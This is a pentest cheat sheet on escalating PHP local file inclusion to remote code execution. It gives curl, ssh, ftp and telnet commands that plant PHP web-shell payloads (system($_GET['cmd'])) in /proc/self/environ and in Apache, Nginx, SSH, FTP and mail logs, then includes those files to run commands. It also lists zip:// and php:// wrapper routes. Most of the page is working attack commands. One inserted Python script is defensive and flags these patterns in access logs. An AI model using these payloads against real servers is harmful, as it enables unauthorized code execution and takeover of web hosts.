LFI 2 RCE

Iconv Filter (CVE-2024-2961)

📚 Resources

Tools

RCE /proc/self/environ

Send the payload in the User-Agent header; it is reflected inside the /proc/self/environ file.

bash
# curl
curl -A "<?=phpinfo(); ?>" "https://example.com/index.php?page=../../../proc/self/environ"

Log poisoning

Inject Malicious Payload

/var/log/apache2 & /var/log/nginx/

  • Apache: /var/log/apache2/access.log, /var/log/apache2/error.log
  • Nginx: /var/log/nginx/access.log, /var/log/nginx/error.log

Inject via GET parameters or User-Agent headers.

bash
# curl
# Single quotes keep the shell from expanding $_GET before curl sends the header
curl -A '<?php system($_GET["cmd"]);?>' "https://example.com/index.php?page=../../../var/log/apache2/access.log"

Others /var/log/...

SSH: /var/log/auth.log

bash
# Sending the payload via SSH
ssh '<?php phpinfo(); ?>'@$TARGET

FTP: /var/log/vsftpd.log

bash
# Sending the payload via FTP
ftp $TARGET
> <?php system($_GET['cmd']); ?>

SMTP: /var/log/mail.log

bash
# Sending the payload via telnet
telnet $TARGET_IP $TARGET_PORT
> MAIL FROM:<john@doe.com>
> RCPT TO:<?php system($_GET['cmd']); ?>

Trigger Execution via LFI

bash
# Accessing the log file via LFI
# URLs are quoted so the shell does not treat & as a background operator
curl -i "$URL/?page=/var/log/auth.log&cmd=id" # SSH
curl -i "$URL/?page=/var/log/vsftpd.log&cmd=id" # FTP
curl -i "$URL/?page=/var/log/mail.log&cmd=id" # SMTP
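
A defender-side check for the log poisoning pattern above, as an added example that is not part of the original page: it scans Apache/Nginx combined-format access log lines for PHP open tags in logged fields (the injection step) and for requests whose URL, after repeated URL-decoding, points at a log file or /proc/self/environ (the trigger step). The sample log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined Log Format: ip ident user [time] "request" status size "referer" "agent"
LINE_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<request>.*?)" \d{3} \S+'
    r' "(?P<referer>.*?)" "(?P<agent>.*)"$'
)
PHP_TAG = re.compile(r"<\?(?:php|=)", re.I)  # injection step
INCLUDE_TARGET = re.compile(r"/proc/self/environ|/var/log/[\w./-]+")  # trigger step

def fully_unquote(value, rounds=3):
    """URL-decode repeatedly so double-encoded paths (%252F) are also seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the list of findings for one access log line."""
    m = LINE_RE.match(line)
    if m is None:
        # Injected quotes can break the format; surface the line for review.
        return ["unparsed"]
    findings = [f"php-tag-in-{name}" for name in ("request", "referer", "agent")
                if PHP_TAG.search(fully_unquote(m[name]))]
    if INCLUDE_TARGET.search(fully_unquote(m["request"])):
        findings.append("include-of-log-or-environ")
    return findings

def scan(lines):
    """Map 1-based line numbers to findings, skipping clean lines."""
    return {n: f for n, line in enumerate(lines, 1) if (f := classify(line))}

# Constructed sample lines (documentation IP range), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2024:13:56:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "<?php system($_GET[\'cmd\']);?>"',
    '203.0.113.9 - - [10/Oct/2024:13:56:09 +0000] "GET /index.php?page=..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Faccess.log&cmd=id HTTP/1.1" 200 9120 "-" "curl/8.5.0"',
    '203.0.113.9 - - [10/Oct/2024:13:56:30 +0000] "GET /index.php?page=../../../proc/self/environ HTTP/1.1" 200 733 "-" "<?=phpinfo(); ?>"',
]

if __name__ == "__main__":
    for n, findings in scan(SAMPLE_LOG).items():
        print(n, findings)
```

The same `PHP_TAG` pattern can be run over raw lines of auth.log, vsftpd.log or mail.log, where the payload arrives as a username or recipient address instead of an HTTP header.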

Others

RCE via

  1. File Upload (e.g., zip, image):

    bash
    example.com/?page=zip://file.zip%23rce.php
  2. PHP Sessions

  3. Wrappers php:// & data://

  4. PHP info (phpinfo) RCE